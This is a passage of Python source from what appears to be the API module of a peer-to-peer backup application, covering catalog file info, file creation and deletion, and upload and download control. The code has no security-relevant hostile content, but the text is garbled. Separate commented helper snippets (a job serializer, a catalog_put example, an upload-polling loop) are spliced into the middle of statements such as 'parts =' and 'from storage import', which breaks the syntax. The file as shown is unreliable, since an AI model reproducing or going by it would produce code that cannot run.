list):\r\n return ERROR(lookup)\r\n for i in lookup:\r\n # if not i['item']['k']:\r\n # i['item']['k'] = my_id.getGlobalID(key_alias='master')\r\n if i['path_id'] == 'index':\r\n continue\r\n if key_id is not None and key_id != i['item']['k']:\r\n continue\r\n if glob_path['key_alias'] and i['item']['k']:\r\n if i['item']['k'] != my_keys.make_key_id(alias=glob_path['key_alias'], creator_glob_id=glob_path['customer']):\r\n continue\r\n key_alias = 'master'\r\n if i['item']['k']:\r\n real_key_id = i['item']['k']\r\n key_alias, real_idurl = my_keys.split_key_id(real_key_id)\r\n real_customer_id = global_id.UrlToGlobalID(real_idurl)\r\n else:\r\n real_key_id = my_keys.make_key_id(alias='master', creator_idurl=customer_idurl)\r\n real_idurl = customer_idurl\r\n real_customer_id = global_id.UrlToGlobalID(customer_idurl)\r\n full_glob_id = global_id.MakeGlobalID(path=i['path_id'], customer=real_customer_id, key_alias=key_alias, )\r\n full_remote_path = global_id.MakeGlobalID(path=i['path'], customer=real_customer_id, key_alias=key_alias, )\r\n result.append({\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': real_customer_id,\r\n 'idurl': real_idurl,\r\n 'path_id': i['path_id'],\r\n 'name': i['name'],\r\n 'path': i['path'],\r\n 'type': backup_fs.TYPES.get(i['type'], '').lower(),\r\n 'size': i['total_size'],\r\n 'local_size': i['item']['s'],\r\n 'latest': i['latest'],\r\n 'key_id': real_key_id,\r\n 'key_alias': key_alias,\r\n 'childs': i['childs'],\r\n 'versions': i['versions'],\r\n })\r\n if _Debug:\r\n lg.out(_DebugLevel, ' %d items returned' % len(result))\r\n return RESULT(result)\r\n\r\n\r\ndef file_info(remote_path, include_uploads=True, include_downloads=True):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_info remote_path=%s include_uploads=%s include_downloads=%s' % (\r\n remote_path, include_uploads, include_downloads))\r\n from storage import backup_fs\r\n from lib import misc\r\n from lib import packetid\r\n from system import bpio\r\n from userid import global_id\r\n glob_path = global_id.ParseGlobalID(remote_path)\r\n norm_path = global_id.NormalizeGlobalID(glob_path.copy())\r\n remotePath = bpio.remotePath(norm_path['path'])\r\n customer_idurl = norm_path['idurl']\r\n if customer_idurl not in backup_fs.known_customers():\r\n return ERROR('customer \"%s\" not found' % customer_idurl)\r\n pathID = 
backup_fs.ToID(remotePath, iter=backup_fs.fs(customer_idurl))\r\n    if not pathID:\r\n        return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n    item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(customer_idurl))\r\n    if not item:\r\n        return ERROR('item \"%s\" is not found in catalog' % pathID)\r\n    (item_size, item_time, versions) = backup_fs.ExtractVersions(pathID, item)  # , customer_id=norm_path['customer'])\r\n    glob_path_item = norm_path.copy()\r\n    glob_path_item['path'] = pathID\r\n    key_alias = 'master'\r\n    if item.key_id:\r\n        key_alias = packetid.KeyAlias(item.key_id)\r\n    r = {\r\n        'remote_path': global_id.MakeGlobalID(\r\n            path=norm_path['path'], customer=norm_path['customer'], key_alias=key_alias,),\r\n        'global_id': global_id.MakeGlobalID(\r\n            path=pathID,\r\n            customer=norm_path['customer'],\r\n            key_alias=key_alias, ),\r\n        'customer': norm_path['customer'],\r\n        'path_id': pathID,\r\n        'path': remotePath,\r\n        'type': backup_fs.TYPES.get(item.type, '').lower(),\r\n        'size': item_size,\r\n        'latest': item_time,\r\n        'key_id': item.key_id,\r\n        'versions': versions,\r\n        'uploads': {\r\n            'running': [],\r\n            'pending': [],\r\n        },\r\n        'downloads': [],\r\n    }\r\n    if include_uploads:\r\n        from storage import backup_control\r\n        backup_control.tasks()\r\n        running = []\r\n        for backupID in backup_control.FindRunningBackup(pathID=pathID):\r\n            j = backup_control.jobs().get(backupID)\r\n            if j:\r\n                running.append({\r\n                    'backup_id': j.backupID,\r\n                    'key_id': j.keyID,\r\n                    'source_path': j.sourcePath,\r\n                    'eccmap': j.eccmap.name,\r\n                    'pipe': 'closed' if not j.pipe else j.pipe.state(),\r\n                    'block_size': j.blockSize,\r\n                    'aborting': j.ask4abort,\r\n                    'terminating': j.terminating,\r\n                    'eof_state': j.stateEOF,\r\n                    'reading': j.stateReading,\r\n                    'closed': j.closed,\r\n                    'work_blocks': len(j.workBlocks),\r\n                    'block_number': j.blockNumber,\r\n                    'bytes_processed': j.dataSent,\r\n                    'progress': misc.percent2string(j.progress()),\r\n                    'total_size': j.totalSize,\r\n                })\r\n        pending = []\r\n        t = backup_control.GetPendingTask(pathID)\r\n        if t:\r\n            pending.append({\r\n                'task_id': t.number,\r\n                'path_id': t.pathID,\r\n                'source_path': t.localPath,\r\n                'created': time.asctime(time.localtime(t.created)),\r\n            })\r\n        r['uploads']['running'] = running\r\n        r['uploads']['pending'] = pending\r\n    if include_downloads:\r\n        from storage import restore_monitor\r\n        downloads = []\r\n        for backupID in restore_monitor.FindWorking(pathID=pathID):\r\n            d = restore_monitor.GetWorkingRestoreObject(backupID)\r\n            if d:\r\n                # serialize fields from the restore object itself, not from the\r\n                # enclosing result dict \"r\" (that was a copy-paste bug)\r\n                downloads.append({\r\n                    'backup_id': d.backup_id,\r\n                    'creator_id': d.creator_id,\r\n                    'path_id': d.path_id,\r\n                    'version': d.version,\r\n                    'block_number': d.block_number,\r\n                    'bytes_processed': d.bytes_written,\r\n                    'created': time.asctime(time.localtime(d.Started)),\r\n                    'aborted': d.abort_flag,\r\n                    'done': d.done_flag,\r\n                    'eccmap': '' if not d.EccMap else d.EccMap.name,\r\n                })\r\n        r['downloads'] = downloads\r\n    lg.out(4, 'api.file_info : \"%s\"' % pathID)\r\n    return RESULT([r, ])\r\n\r\n\r\ndef file_create(remote_path, as_folder=False):\r\n    \"\"\"\r\n    Creates a new file or folder entry in the remote catalog.\r\n    \"\"\"\r\n    if not driver.is_on('service_backups'):\r\n        return ERROR('service_backups() is not started')\r\n    if _Debug:\r\n        lg.out(_DebugLevel, 'api.file_create remote_path=%s as_folder=%s' % (\r\n            remote_path, as_folder, ))\r\n    from storage import backup_fs\r\n    from storage import backup_control\r\n    from system import bpio\r\n    from main import control\r\n    from userid import global_id\r\n    from crypt import my_keys\r\n    parts = 
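# The dict describing a running upload job is built twice: in file_info()
# above and again in files_uploads() below. A sketch of the shared serializer
# both could call (field names copied verbatim from those two functions):
from lib import misc

def serialize_backup_job(j):
    return {
        'backup_id': j.backupID,
        'key_id': j.keyID,
        'source_path': j.sourcePath,
        'eccmap': j.eccmap.name,
        'pipe': 'closed' if not j.pipe else j.pipe.state(),
        'block_size': j.blockSize,
        'aborting': j.ask4abort,
        'terminating': j.terminating,
        'eof_state': j.stateEOF,
        'reading': j.stateReading,
        'closed': j.closed,
        'work_blocks': len(j.workBlocks),
        'block_number': j.blockNumber,
        'bytes_processed': j.dataSent,
        'progress': misc.percent2string(j.progress()),
        'total_size': j.totalSize,
    }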
global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n keyID = my_keys.make_key_id(alias=parts['key_alias'], creator_glob_id=parts['customer'])\r\n keyAlias = parts['key_alias']\r\n if pathID:\r\n return ERROR('remote path \"%s\" already exist in catalog: \"%s\"' % (path, pathID))\r\n if as_folder:\r\n newPathID, parent_iter, parent_iterID = backup_fs.AddDir(\r\n path,\r\n read_stats=False,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n key_id=keyID,\r\n )\r\n else:\r\n parent_path = os.path.dirname(path)\r\n if not backup_fs.IsDir(parent_path, iter=backup_fs.fs(parts['idurl'])):\r\n if backup_fs.IsFile(parent_path, iter=backup_fs.fs(parts['idurl'])):\r\n return ERROR('remote path can not be assigned, file already exist: \"%s\"' % parent_path)\r\n parentPathID, parent_iter, parent_iterID = backup_fs.AddDir(\r\n parent_path,\r\n read_stats=False,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n key_id=keyID,\r\n )\r\n lg.out(4, 'api.file_create parent folder \"%s\" was created at \"%s\"' % (parent_path, parentPathID))\r\n id_iter_iterID = backup_fs.GetIteratorsByPath(\r\n parent_path,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n )\r\n if not id_iter_iterID:\r\n return ERROR('remote path can not be assigned, parent folder not found: \"%s\"' % parent_path)\r\n parentPathID = id_iter_iterID[0]\r\n newPathID, _, _ = backup_fs.PutItem(\r\n name=os.path.basename(path),\r\n parent_path_id=parentPathID,\r\n as_folder=as_folder,\r\n iter=id_iter_iterID[1],\r\n iterID=id_iter_iterID[2],\r\n key_id=keyID,\r\n )\r\n if not newPathID:\r\n return ERROR('remote path can not be assigned, failed to create a new item: \"%s\"' % path)\r\n backup_control.Save()\r\n control.request_update([('pathID', newPathID), ])\r\n full_glob_id = global_id.MakeGlobalID(customer=parts['customer'], path=newPathID, key_alias=keyAlias)\r\n full_remote_path = global_id.MakeGlobalID(customer=parts['customer'], path=parts['path'], key_alias=keyAlias)\r\n lg.out(4, 'api.file_create : \"%s\"' % full_glob_id)\r\n return OK(\r\n 'new %s was created in \"%s\"' % (('folder' if as_folder else 'file'), full_glob_id),\r\n extra_fields={\r\n 'path_id': newPathID,\r\n 'key_id': keyID,\r\n 'path': path,\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': parts['idurl'],\r\n 'type': ('dir' if as_folder else 'file'),\r\n })\r\n\r\n\r\ndef file_delete(remote_path):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_delete remote_path=%s' % remote_path)\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from storage import backup_monitor\r\n from main import settings\r\n from main import control\r\n from lib import packetid\r\n from system import bpio\r\n from userid import global_id\r\n parts = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n if not pathID:\r\n return ERROR('remote path \"%s\" was not found' % parts['path'])\r\n if 
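# file_create() above has to register a missing parent folder first and then
# put the new item inside it -- effectively "mkdir -p" over the catalog. The
# same idea as a standalone sketch over a plain nested dict (illustrative
# only; the real catalog lives in storage.backup_fs):
def catalog_put(catalog, remote_path, as_folder=False):
    parts = [p for p in remote_path.split('/') if p]
    node = catalog
    for name in parts[:-1]:                 # ensure all parent folders exist
        nxt = node.setdefault(name, {})
        if not isinstance(nxt, dict):
            raise ValueError('a file already occupies %r' % name)
        node = nxt
    node[parts[-1]] = {} if as_folder else None   # None marks a plain file
    return catalog

cat = {}
catalog_put(cat, 'photos/2016/cats.png')
print(cat)  # {'photos': {'2016': {'cats.png': None}}}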
not packetid.Valid(pathID):\r\n return ERROR('invalid item found: \"%s\"' % pathID)\r\n pathIDfull = packetid.MakeBackupID(parts['customer'], pathID)\r\n keyAlias = parts['key_alias'] or 'master'\r\n full_glob_id = global_id.MakeGlobalID(customer=parts['customer'], path=pathID, key_alias=keyAlias)\r\n full_remote_path = global_id.MakeGlobalID(customer=parts['customer'], path=parts['path'], key_alias=keyAlias)\r\n result = backup_control.DeletePathBackups(pathID=pathIDfull, saveDB=False, calculate=False)\r\n if not result:\r\n return ERROR('remote item \"%s\" was not found' % pathIDfull)\r\n backup_fs.DeleteLocalDir(settings.getLocalBackupsDir(), pathIDfull)\r\n backup_fs.DeleteByID(pathID, iter=backup_fs.fs(parts['idurl']), iterID=backup_fs.fsID(parts['idurl']))\r\n backup_fs.Scan()\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n backup_monitor.A('restart')\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_delete %s' % parts)\r\n return OK('item \"%s\" was deleted from remote suppliers' % pathIDfull, extra_fields={\r\n 'path_id': pathIDfull,\r\n 'path': path,\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': parts['idurl'],\r\n })\r\n\r\n\r\ndef files_uploads(include_running=True, include_pending=True):\r\n \"\"\"\r\n Returns a list of currently running uploads and\r\n list of pending items to be uploaded.\r\n\r\n Return:\r\n\r\n { 'status': 'OK',\r\n 'result': {\r\n 'running': [{\r\n 'aborting': False,\r\n 'version': '0/0/3/1/F20160424013912PM',\r\n 'block_number': 4,\r\n 'block_size': 16777216,\r\n 'bytes_processed': 67108864,\r\n 'closed': False,\r\n 'eccmap': 'ecc/4x4',\r\n 'eof_state': False,\r\n 'pipe': 0,\r\n 'progress': 75.0142815704418,\r\n 'reading': False,\r\n 'source_path': '/Users/veselin/Downloads/some-ZIP-file.zip',\r\n 'terminating': False,\r\n 'total_size': 89461450,\r\n 'work_blocks': 4\r\n }],\r\n 'pending': [{\r\n 'created': 'Wed Apr 27 15:11:13 2016',\r\n 'id': 3,\r\n 'source_path': '/Users/veselin/Downloads/another-ZIP-file.zip',\r\n 'path_id': '0/0/3/2'\r\n }]\r\n }\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n from lib import misc\r\n from storage import backup_control\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_uploads include_running=%s include_pending=%s' % (include_running, include_pending, ))\r\n lg.out(_DebugLevel, ' %d jobs running, %d tasks pending' % (\r\n len(backup_control.jobs()), len(backup_control.tasks())))\r\n r = {'running': [], 'pending': [], }\r\n if include_running:\r\n r['running'].extend([{\r\n 'version': j.backupID,\r\n 'key_id': j.keyID,\r\n 'source_path': j.sourcePath,\r\n 'eccmap': j.eccmap.name,\r\n 'pipe': 'closed' if not j.pipe else j.pipe.state(),\r\n 'block_size': j.blockSize,\r\n 'aborting': j.ask4abort,\r\n 'terminating': j.terminating,\r\n 'eof_state': j.stateEOF,\r\n 'reading': j.stateReading,\r\n 'closed': j.closed,\r\n 'work_blocks': len(j.workBlocks),\r\n 'block_number': j.blockNumber,\r\n 'bytes_processed': j.dataSent,\r\n 'progress': misc.percent2string(j.progress()),\r\n 'total_size': j.totalSize,\r\n } for j in backup_control.jobs().values()])\r\n if include_pending:\r\n r['pending'].extend([{\r\n 'task_id': t.number,\r\n 'path_id': t.pathID,\r\n 'source_path': t.localPath,\r\n 'created': time.asctime(time.localtime(t.created)),\r\n } for t in backup_control.tasks()])\r\n return RESULT(r)\r\n\r\n\r\ndef file_upload_start(local_path, remote_path, wait_result=False, 
open_share=False):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_upload_start local_path=%s remote_path=%s wait_result=%s open_share=%s' % (\r\n local_path, remote_path, wait_result, open_share, ))\r\n from system import bpio\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from lib import packetid\r\n from main import control\r\n from userid import global_id\r\n from crypt import my_keys\r\n if not bpio.pathExist(local_path):\r\n return ERROR('local file or folder \"%s\" not exist' % local_path)\r\n parts = global_id.NormalizeGlobalID(remote_path)\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n keyID = my_keys.make_key_id(alias=parts['key_alias'], creator_glob_id=parts['customer'])\r\n if not pathID:\r\n return ERROR('path \"%s\" not registered yet' % path)\r\n customerID = global_id.MakeGlobalID(customer=parts['customer'], key_alias=parts['key_alias'])\r\n pathIDfull = packetid.MakeBackupID(customerID, pathID)\r\n if open_share and parts['key_alias'] != 'master':\r\n from access import shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(keyID)\r\n if not active_share:\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(\r\n keyID, log_events=True, publish_events=True, )\r\n active_share.automat('restart')\r\n if wait_result:\r\n d = Deferred()\r\n tsk = backup_control.StartSingle(\r\n pathID=pathIDfull,\r\n localPath=local_path,\r\n keyID=keyID,\r\n )\r\n tsk.result_defer.addCallback(lambda result: d.callback(OK(\r\n 'item \"%s\" uploaded, local path is: \"%s\"' % (remote_path, local_path),\r\n extra_fields={\r\n 'remote_path': remote_path,\r\n 'version': result[0],\r\n 'key_id': tsk.keyID,\r\n 'source_path': local_path,\r\n 'path_id': pathID,\r\n }\r\n )))\r\n tsk.result_defer.addErrback(lambda result: d.callback(ERROR(\r\n 'upload task %d for \"%s\" failed: %s' % (tsk.number, tsk.pathID, result[1], )\r\n )))\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_upload_start %s with %s, wait_result=True' % (remote_path, pathIDfull))\r\n return d\r\n tsk = backup_control.StartSingle(\r\n pathID=pathIDfull,\r\n localPath=local_path,\r\n keyID=keyID,\r\n )\r\n tsk.result_defer.addCallback(lambda result: lg.warn(\r\n 'callback from api.file_upload_start.task(%s) done with %s' % (result[0], result[1], )))\r\n tsk.result_defer.addErrback(lambda result: lg.err(\r\n 'errback from api.file_upload_start.task(%s) failed with %s' % (result[0], result[1], )))\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_upload_start %s with %s' % (remote_path, pathIDfull))\r\n return OK(\r\n 'uploading \"%s\" started, local path is: \"%s\"' % (remote_path, local_path),\r\n extra_fields={\r\n 'remote_path': remote_path,\r\n 'key_id': tsk.keyID,\r\n 'source_path': local_path,\r\n 'path_id': pathID,\r\n })\r\n\r\n\r\ndef file_upload_stop(remote_path):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_upload_stop remote_path=%s' % remote_path)\r\n from storage import 
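# With wait_result=False, file_upload_start() above returns immediately and
# progress is only visible through files_uploads() below. A blocking polling
# sketch (for scripts, not for the twisted reactor thread; the interval and
# timeout values are arbitrary):
import time

def wait_for_uploads(interval=1.0, timeout=60):
    deadline = time.time() + timeout
    while time.time() < deadline:
        r = files_uploads()['result']
        if not r['running'] and not r['pending']:
            return True
        time.sleep(interval)
    return False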
backup_control\r\n from storage import backup_fs\r\n from system import bpio\r\n from userid import global_id\r\n from lib import packetid\r\n parts = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n remotePath = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(parts['idurl']))\r\n if not pathID:\r\n return ERROR('remote path \"%s\" was not found' % parts['path'])\r\n if not packetid.Valid(pathID):\r\n return ERROR('invalid item found: \"%s\"' % pathID)\r\n pathIDfull = packetid.MakeBackupID(parts['customer'], pathID)\r\n r = []\r\n msg = []\r\n if backup_control.AbortPendingTask(pathIDfull):\r\n r.append(pathIDfull)\r\n msg.append('pending item \"%s\" removed' % pathIDfull)\r\n for backupID in backup_control.FindRunningBackup(pathIDfull):\r\n if backup_control.AbortRunningBackup(backupID):\r\n r.append(backupID)\r\n msg.append('backup \"%s\" aborted' % backupID)\r\n if not r:\r\n return ERROR('no running or pending tasks for \"%s\" found' % pathIDfull)\r\n lg.out(4, 'api.file_upload_stop %s' % r)\r\n return RESULT(r, message=(', '.join(msg)))\r\n\r\n\r\ndef files_downloads():\r\n \"\"\"\r\n Returns a list of currently running downloads.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'aborted': False,\r\n 'backup_id': '0/0/3/1/F20160427011209PM',\r\n 'block_number': 0,\r\n 'bytes_processed': 0,\r\n 'creator_id': 'http://veselin-p2p.ru/veselin.xml',\r\n 'done': False,\r\n 'key_id': 'abc$veselin@veselin-p2p.ru',\r\n 'created': 'Wed Apr 27 15:11:13 2016',\r\n 'eccmap': 'ecc/4x4',\r\n 'path_id': '0/0/3/1',\r\n 'version': 'F20160427011209PM'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n from storage import restore_monitor\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_downloads')\r\n lg.out(_DebugLevel, ' %d items downloading at the moment' % len(restore_monitor.GetWorkingObjects()))\r\n return RESULT([{\r\n 'backup_id': r.backup_id,\r\n 'creator_id': r.creator_id,\r\n 'path_id': r.path_id,\r\n 'version': r.version,\r\n 'block_number': r.block_number,\r\n 'bytes_processed': r.bytes_written,\r\n 'created': time.asctime(time.localtime(r.Started)),\r\n 'aborted': r.abort_flag,\r\n 'done': r.done_flag,\r\n 'key_id': r.key_id,\r\n 'eccmap': '' if not r.EccMap else r.EccMap.name,\r\n } for r in restore_monitor.GetWorkingObjects()])\r\n\r\n\r\ndef file_download_start(remote_path, destination_path=None, wait_result=False, open_share=True):\r\n \"\"\"\r\n Download data from remote suppliers to your local machine. 
You can use\r\n different methods to select the target data with `remote_path` input:\r\n\r\n + \"remote path\" of the file\r\n + item ID in the catalog\r\n + full version identifier with item ID\r\n\r\n It is possible to select the destination folder to extract requested files to.\r\n By default this method uses the value specified in local settings, or the user home folder.\r\n\r\n WARNING: Your existing local data will be overwritten!\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'downloading of version 0/0/1/1/0/F20160313043419PM has been started to /Users/veselin/'}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_download_start remote_path=%s destination_path=%s wait_result=%s open_share=%s' % (\r\n remote_path, destination_path, wait_result, open_share, ))\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from storage import restore_monitor\r\n from main import control\r\n from system import bpio\r\n from lib import packetid\r\n from main import settings\r\n from userid import my_id\r\n from userid import global_id\r\n from crypt import my_keys\r\n glob_path = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if packetid.Valid(glob_path['path']):\r\n _, pathID, version = packetid.SplitBackupID(remote_path)\r\n item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(glob_path['customer']))\r\n if not item:\r\n return ERROR('path \"%s\" is not found in catalog' % remote_path)\r\n if not version:\r\n version = item.get_latest_version()\r\n if not version:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n key_alias = 'master'\r\n if item.key_id:\r\n key_alias = packetid.KeyAlias(item.key_id)\r\n customerGlobalID = global_id.MakeGlobalID(customer=glob_path['customer'], key_alias=key_alias)\r\n backupID = packetid.MakeBackupID(customerGlobalID, pathID, version)\r\n else:\r\n remotePath = bpio.remotePath(glob_path['path'])\r\n knownPathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(glob_path['idurl']))\r\n if not knownPathID:\r\n return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n item = backup_fs.GetByID(knownPathID, iterID=backup_fs.fsID(glob_path['idurl']))\r\n if not item:\r\n return ERROR('item \"%s\" is not found in catalog' % knownPathID)\r\n version = glob_path['version']\r\n if not version:\r\n version = item.get_latest_version()\r\n if not version:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n key_alias = 'master'\r\n if item.key_id:\r\n key_alias = packetid.KeyAlias(item.key_id)\r\n customerGlobalID = global_id.MakeGlobalID(customer=glob_path['customer'], key_alias=key_alias)\r\n backupID = packetid.MakeBackupID(customerGlobalID, knownPathID, version)\r\n if backup_control.IsBackupInProcess(backupID):\r\n return ERROR('download not possible, uploading \"%s\" is in process' % backupID)\r\n if restore_monitor.IsWorking(backupID):\r\n return ERROR('downloading task for \"%s\" already scheduled' % backupID)\r\n customerGlobalID, pathID_target, version = packetid.SplitBackupID(backupID)\r\n if not customerGlobalID:\r\n customerGlobalID = global_id.UrlToGlobalID(my_id.getLocalID())\r\n knownPath = backup_fs.ToPath(pathID_target, iterID=backup_fs.fsID(global_id.GlobalUserToIDURL(customerGlobalID)))\r\n if not knownPath:\r\n return ERROR('location \"%s\" not found in catalog' % pathID_target)\r\n if not destination_path:\r\n destination_path = 
settings.getRestoreDir()\r\n if not destination_path:\r\n destination_path = settings.DefaultRestoreDir()\r\n key_id = my_keys.make_key_id(alias=glob_path['key_alias'], creator_glob_id=glob_path['customer'])\r\n ret = Deferred()\r\n \r\n def _on_result(backupID, result):\r\n if result == 'restore done':\r\n ret.callback(OK(\r\n result,\r\n 'version \"%s\" downloaded to \"%s\"' % (backupID, destination_path),\r\n extra_fields={\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n else:\r\n ret.callback(ERROR(\r\n 'downloading version \"%s\" failed, result: %s' % (backupID, result),\r\n extra_fields={\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n \r\n def _start_restore():\r\n if wait_result:\r\n lg.out(4, 'api.file_download_start %s to %s, wait_result=True' % (backupID, destination_path))\r\n restore_monitor.Start(backupID, destination_path, keyID=key_id, callback=_on_result)\r\n control.request_update([('pathID', knownPath), ])\r\n return ret\r\n lg.out(4, 'api.download_start %s to %s' % (backupID, destination_path))\r\n restore_monitor.Start(backupID, destination_path, keyID=key_id, )\r\n control.request_update([('pathID', knownPath), ])\r\n ret.callback(OK(\r\n 'started',\r\n 'downloading of version \"%s\" has been started to \"%s\"' % (backupID, destination_path),\r\n extra_fields={\r\n 'key_id': key_id,\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n \r\n def _share_state_changed(callback_id, active_share, oldstate, newstate, event_string, args):\r\n if oldstate != newstate and newstate == 'CONNECTED':\r\n lg.out(4, 'api.download_start share %s is CONNECTED, removing callback %s' % (\r\n active_share.key_id, callback_id,))\r\n active_share.removeStateChangedCallback(callback_id=callback_id)\r\n _start_restore()\r\n return True\r\n if oldstate != newstate and newstate == 'DISCONNECTED':\r\n lg.out(4, 'api.download_start share %s is DISCONNECTED, removing callback %s' % (\r\n active_share.key_id, callback_id,))\r\n active_share.removeStateChangedCallback(callback_id=callback_id)\r\n ret.callback(ERROR(\r\n 'downloading version \"%s\" failed, result: %s' % (backupID, 'share disconnected'),\r\n extra_fields={\r\n 'key_id': active_share.key_id,\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n return False\r\n\r\n def _open_share():\r\n from access import shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(key_id)\r\n if not active_share:\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(\r\n key_id, log_events=True, publish_events=True, )\r\n lg.out(4, 'api.download_start opened new share : %s' % active_share.key_id)\r\n else:\r\n lg.out(4, 'api.download_start found existing share : %s' % active_share.key_id)\r\n if active_share.state != 'CONNECTED':\r\n cb_id = 'file_download_start_' + str(time.time())\r\n active_share.addStateChangedCallback(\r\n cb=lambda o, n, e, a: _share_state_changed(cb_id, active_share, o, n, e, a),\r\n callback_id=cb_id,\r\n )\r\n active_share.automat('restart')\r\n lg.out(4, 'api.download_start added callback %s to the active share : %s' % (cb_id, active_share.key_id))\r\n else:\r\n lg.out(4, 
'api.download_start existing share %s is currently CONNECTED' % active_share.key_id)\r\n _start_restore()\r\n return True\r\n\r\n if open_share and key_alias != 'master':\r\n _open_share()\r\n else:\r\n if _Debug:\r\n lg.out(_DebugLevel, ' \"open_share\" skipped, starting restore')\r\n _start_restore()\r\n \r\n return ret\r\n\r\n\r\ndef file_download_stop(remote_path):\r\n \"\"\"\r\n Abort currently running restore process.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'restoring of \"alice@p2p-host.com:0/1/2\" aborted'}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_download_stop remote_path=%s' % remote_path)\r\n from storage import backup_fs\r\n from storage import restore_monitor\r\n from system import bpio\r\n from lib import packetid\r\n from userid import my_id\r\n from userid import global_id\r\n glob_path = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n backupIDs = []\r\n if packetid.Valid(glob_path['path']):\r\n customerGlobalID, pathID, version = packetid.SplitBackupID(remote_path)\r\n if not customerGlobalID:\r\n customerGlobalID = global_id.UrlToGlobalID(my_id.getLocalID())\r\n item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(glob_path['customer']))\r\n if not item:\r\n return ERROR('path \"%s\" is not found in catalog' % remote_path)\r\n versions = []\r\n if version:\r\n versions.append(version)\r\n if not versions:\r\n versions.extend(item.get_versions())\r\n for version in versions:\r\n backupIDs.append(packetid.MakeBackupID(customerGlobalID, pathID, version))\r\n else:\r\n remotePath = bpio.remotePath(glob_path['path'])\r\n knownPathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(glob_path['idurl']))\r\n if not knownPathID:\r\n return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n item = backup_fs.GetByID(knownPathID, iterID=backup_fs.fsID(glob_path['idurl']))\r\n if not item:\r\n return 